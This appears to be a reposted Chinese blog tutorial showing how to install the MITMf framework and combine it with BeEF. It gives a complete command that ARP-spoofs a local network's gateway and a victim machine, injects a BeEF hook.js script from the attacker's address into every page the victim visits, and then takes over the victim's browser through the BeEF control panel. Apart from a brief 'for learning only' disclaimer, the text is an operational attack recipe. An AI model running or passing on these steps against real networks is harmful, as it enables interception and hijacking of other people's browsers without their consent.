码迷,mamicode.com
首页 > 其他好文 > 详细

Mitmf中间人攻击框架与beef结合,XSS一把

时间:2017-12-03 18:57:20      阅读:753      评论:0      收藏:0      [点我收藏+]

标签:学习   兼容   panel   linu   win   kali   pst   eth   lib   

本文章中所使用的方法只是未了学习教育,如果读者使用该方法用于恶意用途,造成的法律后果,读者自负;
网站:

https://github.com/byt3bl33d3r/MITMf
技术分享图片
安装Mitmf:
1. 在Debian下安装依赖包
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
技术分享图片

2. 安装mitmf框架

apt-get install mitmf

技术分享图片

注意:不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过,那么先卸载之前的版本。输入命令:

pip uninstall twisted  kali linux 2017.3是不需要卸载但是需要重新安装下边的内容:

并用 wget 命令进行下载。

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2  

 

进行中间人XSS

1. 启动beef

cd /usr/share/beef-xss/

./beef

技术分享图片

2. 利用mitmf进行中间人XSS攻击

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.103 –inject –sj-url http://192.168.1.104:3000/hook.js 执行后,只要用户对任何网站进行对应访问,访问页面中就被插入js代码;接下来就可以使用beef进行对应控制;

技术分享图片

查看网页源代码

技术分享图片

访问  127.0.0.1:3000/ui/panel

技术分享图片

接下来就可以使用beef神器对这个windows进行很多有意思的实验。

 

 

 



Mitmf中间人攻击框架与beef结合,XSS一把

标签:学习   兼容   panel   linu   win   kali   pst   eth   lib   

原文地址:http://www.cnblogs.com/PythonInMyLife/p/7966702.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!